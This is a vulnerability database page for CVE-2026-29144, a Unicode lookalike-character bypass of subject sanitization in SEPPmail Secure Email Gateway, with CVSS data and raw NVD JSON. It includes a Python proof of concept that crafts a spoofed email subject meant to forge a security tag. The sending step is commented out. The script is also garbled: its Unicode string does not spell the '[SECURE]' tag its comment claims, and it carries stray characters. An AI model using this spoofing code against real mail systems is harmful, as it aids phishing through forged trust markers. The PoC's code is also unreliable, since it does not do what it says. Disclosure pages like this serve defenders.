Security Vulnerability Report
中文
CVE-2026-29144 CVSS 5.3 MEDIUM

CVE-2026-29144

Published: 2026-04-02 09:16:23
Last Modified: 2026-04-16 19:00:40
Source: [email protected]

Description

SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to bypass subject sanitization and forge security tags using Unicode lookalike characters.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:* - VULNERABLE
SEPPmail Secure Email Gateway < 15.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept: Unicode Homoglyph Attack # This script demonstrates how to craft a subject line that bypasses basic filtering. import smtplib from email.mime.text import MIMEText # Normal subject might be: [SECURE] Confidential Data # Attacker uses lookalike characters (e.g., Cyrillic 'а' instead of Latin 'a') # or Full-width characters. # Example using Fullwidth Latin characters for visual spoofing # [SECURE] -> \uFF33\uFF25\uFF23\uFF35\uFF32\uFF25 spoofed_subject = "\uFF33\uFF25\uFF23\uFF35\uFF32\uFF25\uFF29\uFF34\uFF29\uFF3C\uFF20\uFF20\uFF20] Invoice Payment" def send_spoofed_email(): msg = MIMEText("This is a test email attempting to spoof the security tag.") msg['Subject'] = spoofed_subject msg['From'] = '[email protected]' msg['To'] = '[email protected]' # Note: This is a conceptual PoC. Replace with actual SMTP server details if testing in a lab. print(f"Sending email with subject: {msg['Subject']}") # with smtplib.SMTP('smtp.example.com', 587) as server: # server.login('user', 'password') # server.send_message(msg) if __name__ == "__main__": send_spoofed_email()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29144", "sourceIdentifier": "[email protected]", "published": "2026-04-02T09:16:23.293", "lastModified": "2026-04-16T19:00:40.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to bypass subject sanitization and forge security tags using Unicode lookalike characters."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.3", "matchCriteriaId": "E3729650-81CA-4311-94BF-14A7A191F8D1"}]}]}], "references": [{"url": "https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.